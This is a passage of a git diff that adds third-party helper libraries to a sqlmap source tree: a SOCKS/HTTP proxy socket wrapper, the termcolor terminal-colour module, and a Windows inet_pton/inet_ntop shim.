None) + self.__proxysockname = None + self.__proxypeername = None + + def __recvall(self, count): + """__recvall(count) -> data + Receive EXACTLY the number of bytes requested from the socket. + Blocks until the required number of bytes have been received. + """ + data = self.recv(count) + while len(data) < count: + d = self.recv(count-len(data)) + if not d: raise GeneralProxyError((0, "connection closed unexpectedly")) + data = data + d + return data + + def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None): + """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) + Sets the proxy to be used. + proxytype - The type of the proxy to be used. Three types + are supported: PROXY_TYPE_SOCKS4 (including socks4a), + PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP + addr - The address of the server (IP or DNS). + port - The port of the server. Defaults to 1080 for SOCKS + servers and 8080 for HTTP proxy servers. + rdns - Should DNS queries be preformed on the remote side + (rather than the local side). The default is True. + Note: This has no effect with SOCKS4 servers. + username - Username to authenticate with to the server. + The default is no authentication. + password - Password to authenticate with to the server. + Only relevant when username is also provided. + """ + self.__proxy = (proxytype, addr, port, rdns, username, password) + + def __negotiatesocks5(self, destaddr, destport): + """__negotiatesocks5(self,destaddr,destport) + Negotiates a connection through a SOCKS5 server. + """ + # First we'll send the authentication packages we support. + if (self.__proxy[4]!=None) and (self.__proxy[5]!=None): + # The username/password details were supplied to the + # setproxy method so we support the USERNAME/PASSWORD + # authentication (in addition to the standard none). + self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02)) + else: + # No username/password were entered, therefore we + # only support connections with no authentication. + self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00)) + # We'll receive the server's response to determine which + # method was selected + chosenauth = self.__recvall(2) + if chosenauth[0:1] != b'\x05': + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + # Check the chosen authentication method + if chosenauth[1:2] == b'\x00': + # No authentication is required + pass + elif chosenauth[1:2] == b'\x02': + # Okay, we need to perform a basic username/password + # authentication. + self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode()) + authstat = self.__recvall(2) + if authstat[0:1] != b'\x01': + # Bad response + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + if authstat[1:2] != b'\x00': + # Authentication failed + self.close() + raise Socks5AuthError((3, _socks5autherrors[3])) + # Authentication succeeded + else: + # Reaching here is always bad + self.close() + if chosenauth[1:2] == b'\xff': + raise Socks5AuthError((2, _socks5autherrors[2])) + else: + raise GeneralProxyError((1, _generalerrors[1])) + # Now we can request the actual connection + req = struct.pack('BBB', 0x05, 0x01, 0x00) + # If the given destination address is an IP address, we'll + # use the IPv4 address request even if remote resolving was specified. + try: + ipaddr = socket.inet_aton(destaddr) + req = req + b'\x01' + ipaddr + except socket.error: + # Well it's not an IP number, so it's probably a DNS name. + if self.__proxy[3]: + # Resolve remotely + ipaddr = None + req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + (destaddr if isinstance(destaddr, bytes) else destaddr.encode()) + else: + # Resolve locally + ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) + req = req + chr(0x01).encode() + ipaddr + req = req + struct.pack(">H", destport) + self.sendall(req) + # Get the response + resp = self.__recvall(4) + if resp[0:1] != chr(0x05).encode(): + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + elif resp[1:2] != chr(0x00).encode(): + # Connection failed + self.close() + if ord(resp[1:2])<=8: + raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])])) + else: + raise Socks5Error((9, _socks5errors[9])) + # Get the bound address/port + elif resp[3:4] == chr(0x01).encode(): + boundaddr = self.__recvall(4) + elif resp[3:4] == chr(0x03).encode(): + resp = resp + self.recv(1) + boundaddr = self.__recvall(ord(resp[4:5])) + else: + self.close() + raise GeneralProxyError((1,_generalerrors[1])) + boundport = struct.unpack(">H", self.__recvall(2))[0] + self.__proxysockname = (boundaddr, boundport) + if ipaddr != None: + self.__proxypeername = (socket.inet_ntoa(ipaddr), destport) + else: + self.__proxypeername = (destaddr, destport) + + def getproxysockname(self): + """getsockname() -> address info + Returns the bound IP address and port number at the proxy. + """ + return self.__proxysockname + + def getproxypeername(self): + """getproxypeername() -> address info + Returns the IP and port number of the proxy. + """ + return _orgsocket.getpeername(self) + + def getpeername(self): + """getpeername() -> address info + Returns the IP address and port number of the destination + machine (note: getproxypeername returns the proxy) + """ + return self.__proxypeername + + def __negotiatesocks4(self,destaddr,destport): + """__negotiatesocks4(self,destaddr,destport) + Negotiates a connection through a SOCKS4 server. + """ + # Check if the destination address provided is an IP address + rmtrslv = False + try: + ipaddr = socket.inet_aton(destaddr) + except socket.error: + # It's a DNS name. Check where it should be resolved. + if self.__proxy[3]: + ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01) + rmtrslv = True + else: + ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) + # Construct the request packet + req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr + # The username parameter is considered userid for SOCKS4 + if self.__proxy[4] != None: + req = req + self.__proxy[4] + req = req + chr(0x00).encode() + # DNS name if remote resolving is required + # NOTE: This is actually an extension to the SOCKS4 protocol + # called SOCKS4A and may not be supported in all cases. + if rmtrslv: + req = req + destaddr + chr(0x00).encode() + self.sendall(req) + # Get the response from the server + resp = self.__recvall(8) + if resp[0:1] != chr(0x00).encode(): + # Bad data + self.close() + raise GeneralProxyError((1,_generalerrors[1])) + if resp[1:2] != chr(0x5A).encode(): + # Server returned an error + self.close() + if ord(resp[1:2]) in (91, 92, 93): + self.close() + raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90])) + else: + raise Socks4Error((94, _socks4errors[4])) + # Get the bound address/port + self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0]) + if rmtrslv != None: + self.__proxypeername = (socket.inet_ntoa(ipaddr), destport) + else: + self.__proxypeername = (destaddr, destport) + + def __negotiatehttp(self, destaddr, destport): + """__negotiatehttp(self,destaddr,destport) + Negotiates a connection through an HTTP server. + """ + # If we need to resolve locally, we do this now + if not self.__proxy[3]: + addr = socket.gethostbyname(destaddr) + else: + addr = destaddr + self.sendall(("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode()) + # We read the response until we get the string "\r\n\r\n" + resp = self.recv(1) + while resp.find("\r\n\r\n".encode()) == -1: + resp = resp + self.recv(1) + # We just need the first line to check if the connection + # was successful + statusline = resp.splitlines()[0].split(" ".encode(), 2) + if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()): + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + try: + statuscode = int(statusline[1]) + except ValueError: + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + if statuscode != 200: + self.close() + raise HTTPError((statuscode, statusline[2])) + self.__proxysockname = ("0.0.0.0", 0) + self.__proxypeername = (addr, destport) + + def connect(self, destpair): + """connect(self, despair) + Connects to the specified destination through a proxy. + destpar - A tuple of the IP/DNS address and the port number. + (identical to socket's connect). + To select the proxy server use setproxy(). + """ + # Do a minimal input check first + if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int): + raise GeneralProxyError((5, _generalerrors[5])) + if self.__proxy[0] == PROXY_TYPE_SOCKS5: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 1080 + _orgsocket.connect(self, (self.__proxy[1], portnum)) + self.__negotiatesocks5(destpair[0], destpair[1]) + elif self.__proxy[0] == PROXY_TYPE_SOCKS4: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 1080 + _orgsocket.connect(self,(self.__proxy[1], portnum)) + self.__negotiatesocks4(destpair[0], destpair[1]) + elif self.__proxy[0] == PROXY_TYPE_HTTP: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 8080 + _orgsocket.connect(self,(self.__proxy[1], portnum)) + self.__negotiatehttp(destpair[0], destpair[1]) + elif self.__proxy[0] == None: + _orgsocket.connect(self, (destpair[0], destpair[1])) + else: + raise GeneralProxyError((4, _generalerrors[4])) + +def create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, + source_address=None): + # Patched for a DNS-leakage + host, port = address + sock = None + try: + sock = socksocket(socket.AF_INET, socket.SOCK_STREAM) + if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT: + sock.settimeout(timeout) + if source_address: + sock.bind(source_address) + sock.connect(address) + except socket.error: + if sock is not None: + sock.close() + raise + return sock diff --git a/src/sqlmap-master/thirdparty/termcolor/__init__.py b/src/sqlmap-master/thirdparty/termcolor/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/sqlmap-master/thirdparty/termcolor/termcolor.py b/src/sqlmap-master/thirdparty/termcolor/termcolor.py new file mode 100644 index 0000000..ddea6dd --- /dev/null +++ b/src/sqlmap-master/thirdparty/termcolor/termcolor.py @@ -0,0 +1,173 @@ +# coding: utf-8 +# Copyright (c) 2008-2011 Volvox Development Team +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +# THE SOFTWARE. +# +# Author: Konstantin Lepa + +"""ANSII Color formatting for output in terminal.""" + +from __future__ import print_function +import os + + +__ALL__ = [ 'colored', 'cprint' ] + +VERSION = (1, 1, 0) + +ATTRIBUTES = dict( + list(zip([ + 'bold', + 'dark', + '', + 'underline', + 'blink', + '', + 'reverse', + 'concealed' + ], + list(range(1, 9)) + )) + ) +del ATTRIBUTES[''] + + +HIGHLIGHTS = dict( + list(zip([ + 'on_grey', + 'on_red', + 'on_green', + 'on_yellow', + 'on_blue', + 'on_magenta', + 'on_cyan', + 'on_white' + ], + list(range(40, 48)) + )) + ) + + +COLORS = dict( + list(zip([ + 'grey', + 'red', + 'green', + 'yellow', + 'blue', + 'magenta', + 'cyan', + 'white', + ], + list(range(30, 38)) + )) + ) + +COLORS.update(dict(("light%s" % color, COLORS[color] + 60) for color in COLORS)) + +# Reference: https://misc.flogisoft.com/bash/tip_colors_and_formatting +COLORS["lightgrey"] = 37 +COLORS["darkgrey"] = 90 + +RESET = '\033[0m' + + +def colored(text, color=None, on_color=None, attrs=None): + """Colorize text. + + Available text colors: + red, green, yellow, blue, magenta, cyan, white. + + Available text highlights: + on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan, on_white. + + Available attributes: + bold, dark, underline, blink, reverse, concealed. + + Example: + colored('Hello, World!', 'red', 'on_grey', ['blue', 'blink']) + colored('Hello, World!', 'green') + """ + if os.getenv('ANSI_COLORS_DISABLED') is None: + fmt_str = '\033[%dm%s' + if color is not None: + text = fmt_str % (COLORS[color], text) + + if on_color is not None: + text = fmt_str % (HIGHLIGHTS[on_color], text) + + if attrs is not None: + for attr in attrs: + text = fmt_str % (ATTRIBUTES[attr], text) + + text += RESET + return text + + +def cprint(text, color=None, on_color=None, attrs=None, **kwargs): + """Print colorize text. + + It accepts arguments of print function. + """ + + print((colored(text, color, on_color, attrs)), **kwargs) + + +if __name__ == '__main__': + print('Current terminal type: %s' % os.getenv('TERM')) + print('Test basic colors:') + cprint('Grey color', 'grey') + cprint('Red color', 'red') + cprint('Green color', 'green') + cprint('Yellow color', 'yellow') + cprint('Blue color', 'blue') + cprint('Magenta color', 'magenta') + cprint('Cyan color', 'cyan') + cprint('White color', 'white') + print(('-' * 78)) + + print('Test highlights:') + cprint('On grey color', on_color='on_grey') + cprint('On red color', on_color='on_red') + cprint('On green color', on_color='on_green') + cprint('On yellow color', on_color='on_yellow') + cprint('On blue color', on_color='on_blue') + cprint('On magenta color', on_color='on_magenta') + cprint('On cyan color', on_color='on_cyan') + cprint('On white color', color='grey', on_color='on_white') + print('-' * 78) + + print('Test attributes:') + cprint('Bold grey color', 'grey', attrs=['bold']) + cprint('Dark red color', 'red', attrs=['dark']) + cprint('Underline green color', 'green', attrs=['underline']) + cprint('Blink yellow color', 'yellow', attrs=['blink']) + cprint('Reversed blue color', 'blue', attrs=['reverse']) + cprint('Concealed Magenta color', 'magenta', attrs=['concealed']) + cprint('Bold underline reverse cyan color', 'cyan', + attrs=['bold', 'underline', 'reverse']) + cprint('Dark blink concealed white color', 'white', + attrs=['dark', 'blink', 'concealed']) + print(('-' * 78)) + + print('Test mixing:') + cprint('Underline red on grey color', 'red', 'on_grey', + ['underline']) + cprint('Reversed green on red color', 'green', 'on_red', ['reverse']) + diff --git a/src/sqlmap-master/thirdparty/wininetpton/__init__.py b/src/sqlmap-master/thirdparty/wininetpton/__init__.py new file mode 100644 index 0000000..5ea298d --- /dev/null +++ b/src/sqlmap-master/thirdparty/wininetpton/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# +# Copyright Ryan Vennell +# +# This software released into the public domain. Anyone is free to copy, +# modify, publish, use, compile, sell, or distribute this software, +# either in source code form or as a compiled binary, for any purpose, +# commercial or non-commercial, and by any means. + +pass diff --git a/src/sqlmap-master/thirdparty/wininetpton/win_inet_pton.py b/src/sqlmap-master/thirdparty/wininetpton/win_inet_pton.py new file mode 100644 index 0000000..50ae621 --- /dev/null +++ b/src/sqlmap-master/thirdparty/wininetpton/win_inet_pton.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python +# This software released into the public domain. Anyone is free to copy, +# modify, publish, use, compile, sell, or distribute this software, +# either in source code form or as a compiled binary, for any purpose, +# commercial or non-commercial, and by any means. + +import socket +import ctypes +import os + + +class sockaddr(ctypes.Structure): + _fields_ = [("sa_family", ctypes.c_short), + ("__pad1", ctypes.c_ushort), + ("ipv4_addr", ctypes.c_byte * 4), + ("ipv6_addr", ctypes.c_byte * 16), + ("__pad2", ctypes.c_ulong)] + +if hasattr(ctypes, 'windll'): + WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA + WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA +else: + def not_windows(): + raise SystemError( + "Invalid platform. ctypes.windll must be available." + ) + WSAStringToAddressA = not_windows + WSAAddressToStringA = not_windows + + +def inet_pton(address_family, ip_string): + addr = sockaddr() + addr.sa_family = address_family + addr_size = ctypes.c_int(ctypes.sizeof(addr)) + + if WSAStringToAddressA( + ip_string, + address_family, + None, + ctypes.byref(addr), + ctypes.byref(addr_size) + ) != 0: + raise socket.error(ctypes.FormatError()) + + if address_family == socket.AF_INET: + return ctypes.string_at(addr.ipv4_addr, 4) + if address_family == socket.AF_INET6: + return ctypes.string_at(addr.ipv6_addr, 16) + + raise socket.error('unknown address family') + + +def inet_ntop(address_family, packed_ip): + addr = sockaddr() + addr.sa_family = address_family + addr_size = ctypes.c_int(ctypes.sizeof(addr)) + ip_string = ctypes.create_string_buffer(128) + ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string)) + + if address_family == socket.AF_INET: + if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr): + raise socket.error('packed IP wrong length for inet_ntoa') + ctypes.memmove(addr.ipv4_addr, packed_ip, 4) + elif address_family == socket.AF_INET6: + if len(packed_ip) != ctypes.sizeof(addr.ipv6_addr): + raise socket.error('packed IP wrong length for inet_ntoa') + ctypes.memmove(addr.ipv6_addr, packed_ip, 16) + else: + raise socket.error('unknown address family') + + if WSAAddressToStringA( + ctypes.byref(addr), + addr_size, + None, + ip_string, + ctypes.byref(ip_string_size) + ) != 0: + raise socket.error(ctypes.FormatError()) + + return ip_string[:ip_string_size.value - 1] + +# Adding our two functions to the socket library +if os.name == 'nt': + socket.inet_pton = inet_pton + socket.inet_ntop = inet_ntop